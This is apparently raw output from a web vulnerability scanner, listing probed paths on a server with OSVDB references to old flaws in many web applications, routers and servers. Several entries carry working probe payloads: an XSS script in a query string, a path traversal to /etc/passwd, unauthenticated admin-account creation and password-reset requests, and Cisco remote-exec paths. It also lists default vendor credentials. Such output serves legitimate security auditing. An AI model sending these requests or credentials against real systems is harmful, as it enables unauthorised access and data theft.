+ OSVDB-4015: /jigsaw/: Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) in the error page.
+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
+ OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /anthill/login.php: Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and http://www.cert.org/advisories/CA-2000-02.html
+ /cfdocs/expeval/sendmail.cfm: Can be used to send email; go to the page and fill in the form
+ OSVDB-22: /cgi-bin/bigconf.cgi: BigIP Configuration CGI
+ /ammerum/: Ammerum pre 0.6-1 had several security issues.
+ /ariadne/: Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.
+ /cbms/cbmsfoot.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/changepass.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/editclient.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/passgen.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/realinv.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/usersetup.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C: This check (A) sets up the next bad blue test (B) for possible exploit. See http://www.badblue.com/down.htm
+ OSVDB-59412: /db/users.dat: upb PB allows the user database to be retrieved remotely.
+ /Admin_files/order.log: Selena Sol's WebStore 1.0 exposes order information, http://www.extropia.com/, http://www.mindsec.com/advisories/post2.txt.
+ /admin/cplogfile.log: DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version.
+ /admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
+ /cfdocs/snippets/fileexists.cfm: Can be used to verify the existance of files (on the same drive info as the web tree/file)
+ /cgi-bin/MachineInfo: Gives out information on the machine (IRIX), including hostname
+ OSVDB-59646: /chat/!nicks.txt: WF-Chat 1.0 Beta allows retrieval of user information.
+ OSVDB-59645: /chat/!pwds.txt: WF-Chat 1.0 Beta allows retrieval of user information.
+ OSVDB-53304: /chat/data/usr: SimpleChat! 1.3 allows retrieval of user information.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /config/: Configuration information may be available remotely.
+ /cplogfile.log: XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version.
+ /examples/jsp/snp/anything.snp: Tomcat servlet gives lots of host information.
+ /cfdocs/snippets/evaluate.cfm: Can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info
+ /cfide/Administrator/startstop.html: Can start/stop the server
+ OSVDB-10598: /cd-cgi/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ /cgi-bin/handler: Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands
+ OSVDB-235: /cgi-bin/webdist.cgi: Comes with IRIX 5.0 - 6.3; allows to run arbitrary commands
+ OSVDB-55: /ews/ews/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. http://www.securityfocus.com/bid/2665.
+ OSVDB-5280: /instantwebmail/message.php: Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ /admin.php4?reg_login=1: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ OSVDB-3233: /admin/admin_phpinfo.php4: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-5178: /dostuff.php?action=modify_user: Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/
+ OSVDB-5088: /accounts/getuserdesc.asp: Hosting Controller 2002 administration page is available. This should be protected.
+ OSVDB-35876: /agentadmin.php: Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.
+ /sqldump.sql: Database SQL?
+ /structure.sql: Database SQL?
+ /servlet/SessionManager: IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.
+ /ip.txt: This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file.
+ /level/42/exec/show%20conf: Retrieved Cisco configuration file.
+ /livehelp/: LiveHelp may reveal system information.
+ /LiveHelp/: LiveHelp may reveal system information.
+ OSVDB-59536: /logicworks.ini: web-erp 0.1.4 and earlier allow .ini files to be read remotely.
+ /logs/str_err.log: Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries).
+ OSVDB-6465: /mall_log_files/order.log: EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details.
+ OSVDB-3204: /megabook/files/20/setup.db: Megabook guestbook configuration available remotely.
+ OSVDB-6161: /officescan/hotdownload/ofscan.ini: OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords.
+ /order/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /order/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /orders/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /Orders/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /orders/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /Orders/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /pmlite.php: A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested). See http://www.phpsecure.org/?zone=pComment&d=101 for details.
+ /session/admnlogin: SessionServlet Output, has session cookie info.
+ OSVDB-613: /SiteScope/htdocs/SiteScope.html: The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.
+ /servlet/allaire.jrun.ssi.SSIFilter: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call, see MPSB01-12 http://www.macromedia.com/devnet/security/security_zone/mpsb01-12.html.
+ OSVDB-2881: /pp.php?action=login: Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.
+ /isapi/count.pl?: AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.
+ /krysalis/: Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot
+ /logjam/showhits.php: Logjam may possibly allow remote command execution via showhits.php page.
+ /manual.php: Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.
+ OSVDB-14329: /smssend.php: PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php
+ OSVDB-113: /ncl_items.html: This may allow attackers to reconfigure your Tektronix printer.
+ OSVDB-551: /ncl_items.shtml?SUBJECT=1: This may allow attackers to reconfigure your Tektronix printer.
+ /photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ /photodata/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ OSVDB-5374: /pub/english.cgi?op=rmail: BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely.
+ /pvote/ch_info.php?newpass=password&confirm=password%20: PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.
+ OSVDB-240: /scripts/wsisa.dll/WService=anything?WSMadmin: Allows Webspeed to be remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0.
+ OSVDB-3092: /SetSecurity.shm: Cisco System's My Access for Wireless. This resource should be password protected.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-2225: /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin: paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.
+ OSVDB-3092: /shopadmin.asp: VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.
+ OSVDB-3092: /_vti_txt/_vti_cnf/: FrontPage directory found.
+ OSVDB-3092: /_vti_txt/: FrontPage directory found.
+ OSVDB-3092: /_vti_pvt/deptodoc.btr: FrontPage file found. This may contain useful information.
+ OSVDB-3092: /_vti_pvt/doctodep.btr: FrontPage file found. This may contain useful information.
+ OSVDB-3092: /_vti_pvt/services.org: FrontPage file found. This may contain useful information.
+ OSVDB-28260: /_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611: Gives info about server settings. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0413, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0709, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0710, http://www.securityfocus.com/bid/1608, http://www.securityfocus.com/bid/1174.
+ OSVDB-28260: /_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611: Gives info about server settings.
+ OSVDB-3092: /_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false: We seem to have authoring access to the FrontPage web.
+ OSVDB-3092: /_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false: We seem to have authoring access to the FrontPage web.
+ OSVDB-3092: /_vti_bin/_vti_aut/dvwssr.dll: This dll allows anyone with authoring privs to change other users file, and may contain a buffer overflow for unauthenticated users. See also : http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=1. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/MS00-025.
+ OSVDB-3092: /_vti_bin/_vti_aut/fp30reg.dll: Some versions of the FrontPage fp30reg.dll are vulnerable to a buffer overflow. See http://www.microsoft.com/technet/security/bulletin/https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-051.asp for details.
+ OSVDB-473: /_vti_pvt/access.cnf: Contains HTTP server-specific access control information. Remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/service.cnf: Contains meta-information about the web server Remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/services.cnf: Contains the list of subwebs. Remove or ACL if FrontPage is not being used. May reveal server version if Admin has changed it.
+ OSVDB-473: /_vti_pvt/svacl.cnf: File used to store whether subwebs have unique permissions settings and any IP address restrictions. Can be used to discover information about subwebs, remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/writeto.cnf: Contains information about form handler result files. Remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/linkinfo.cnf: IIS file shows http links on and off site. Might show host trust relationships and other machines on network.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-48: /doc: The /doc directory is browsable. This may be /usr/doc.
+ OSVDB-250: /cgis/wwwboard/wwwboard.cgi: Versions 2.0 Alpha and below have multiple problems. See http://www.securityfocus.com/bid/1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.
+ OSVDB-250: /cgis/wwwboard/wwwboard.pl: Versions 2.0 Alpha and below have multiple problems. See http://www.securityfocus.com/bid/1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.
+ OSVDB-376: /manager/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-376: /jk-manager/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-376: /jk-status/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-376: /host-manager/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-568: /blahb.ida: Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2001/MS01-033.
+ OSVDB-568: /blahb.idq: Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2001/MS01-033.
+ OSVDB-2117: /BACLIENT: IBM Tivoli default file found.
+ OSVDB-578: /level/16/exec/-///pwd: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec/-///show/configuration: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec/: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec//show/access-lists: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/configuration: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/interfaces: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/interfaces/status: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/version: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/running-config/interface/FastEthernet: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/17/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/18/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/19/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/20/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/21/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/22/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/23/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/24/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/25/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/26/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/27/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/28/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/29/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/30/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/31/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/32/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/33/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/34/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/35/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/36/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/37/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/38/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/39/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/40/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/41/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/42/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/43/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/44/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/45/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/46/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/47/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/48/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/49/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/50/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/51/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/52/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/53/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/54/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/55/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/56/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/57/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/58/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/59/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/60/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/61/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/62/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/63/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/64/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/65/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/66/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/67/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/68/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/69/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/70/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/71/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/72/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/73/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/74/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/75/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/76/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/77/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/78/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/79/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/80/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/81/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/82/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/83/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/84/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/85/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/86/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/87/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/88/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/89/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/90/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/91/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/92/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/93/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/94/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/95/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/96/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/97/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/98/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/99/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-18810: /users.lst: LocalWEB2000 users.lst passwords found
+ OSVDB-13405: /WS_FTP.LOG: WS_FTP.LOG file was found. It may contain sensitive information.
+ OSVDB-3715: /nsn/env.bas: Novell web server shows the server environment and is vulnerable to cross-site scripting
+ OSVDB-3722: /lcgi/lcgitest.nlm: Novell web server shows the server environment
+ OSVDB-13404: /com/: Novell web server allows directory listing
+ OSVDB-13402: /com/novell/: Novell web server allows directory listing
+ OSVDB-13403: /com/novell/webaccess: Novell web server allows directory listing
+ OSVDB-4804: //admin/admin.shtml: Axis network camera may allow admin bypass by using double-slashes before URLs.
+ OSVDB-4808: /axis-cgi/buffer/command.cgi: Axis WebCam 2400 may allow overwriting or creating files on the system. See http://www.websec.org/adv/axis2400.txt.html for details.
+ OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html
+ OSVDB-228: /upload.cgi+: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in the Apache conf file or restrict access to allowed sources.
+ OSVDB-1264: /publisher/: Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0237.
+ OSVDB-134: /cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd: Comes with IRIX 6.2-6.4; allows to run arbitrary commands
+ OSVDB-155: /counter/1/n/n/0/3/5/0/a/123.gif: The Roxen Counter may eat up excessive CPU time with image requests.
+ OSVDB-2: /iissamples/exair/search/search.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-2117: /cpanel/: Web-based control panel
+ OSVDB-2119: /shopping/diag_dbtest.asp: VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0560, http://www.securityfocus.com/bid/8159
+ OSVDB-250: /wwwboard/passwd.txt: The wwwboard password file is browsable. Change wwwboard to store this file elsewhere, or upgrade to the latest version.
+ OSVDB-2695: /photo/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.
+ OSVDB-2695: /photodata/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.
+ OSVDB-272: /msadc/msadcs.dll: See RDS advisory RFP9902, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1011, https://docs.microsoft.com/en-us/security-updates/securitybulletins/2098/MS98-004, https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-025 RFP-9902 BID-29 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d1.htm), CIAC J-054 http://www.ciac.org/ciac/bulletins/j-054.shtml www.securityfocus.com/bid/529
+ OSVDB-2735: /musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-275: /scripts/tools/newdsn.exe: This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. http://www.securityfocus.com/bid/1818. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)
+ OSVDB-2813: /admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
+ OSVDB-284: /iisadmpwd/aexp2.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp2b.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp3.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp4.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp4b.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-3093: /forum_professionnel.asp?n=100: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /functions.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-10447: /get_od_toc.pl?Profile=: WebTrends get_od_toc.pl may be vulnerable to a path disclosure error if this file is reloaded multiple times.
+ OSVDB-3093: /globals.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /globals.pl: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-6656: /Gozila.cgi: Linksys BEF Series routers are vulnerable to multiple DoS attacks in Gozila.cgi.
+ OSVDB-3093: /homebet/homebet.dll?form=menu&option=menu-signin: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /idealbb/error.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /include/customize.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /include/help.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /includes/footer.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /includes/header.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/contact/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/faq/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/gen/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/services/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /instaboard/index.cfm: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /intranet/browse.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /invitefriends.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ipchat.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ixmail_netattach.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /jsptest.jsp+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /kernel/class/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /kernel/classes/ezrole.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ldap.search.php3?ldap_serv=nonsense%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /livredor/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /login.php3?reason=chpass2%20: This might be interesting... has been seen in web logs from an unknown scanner.
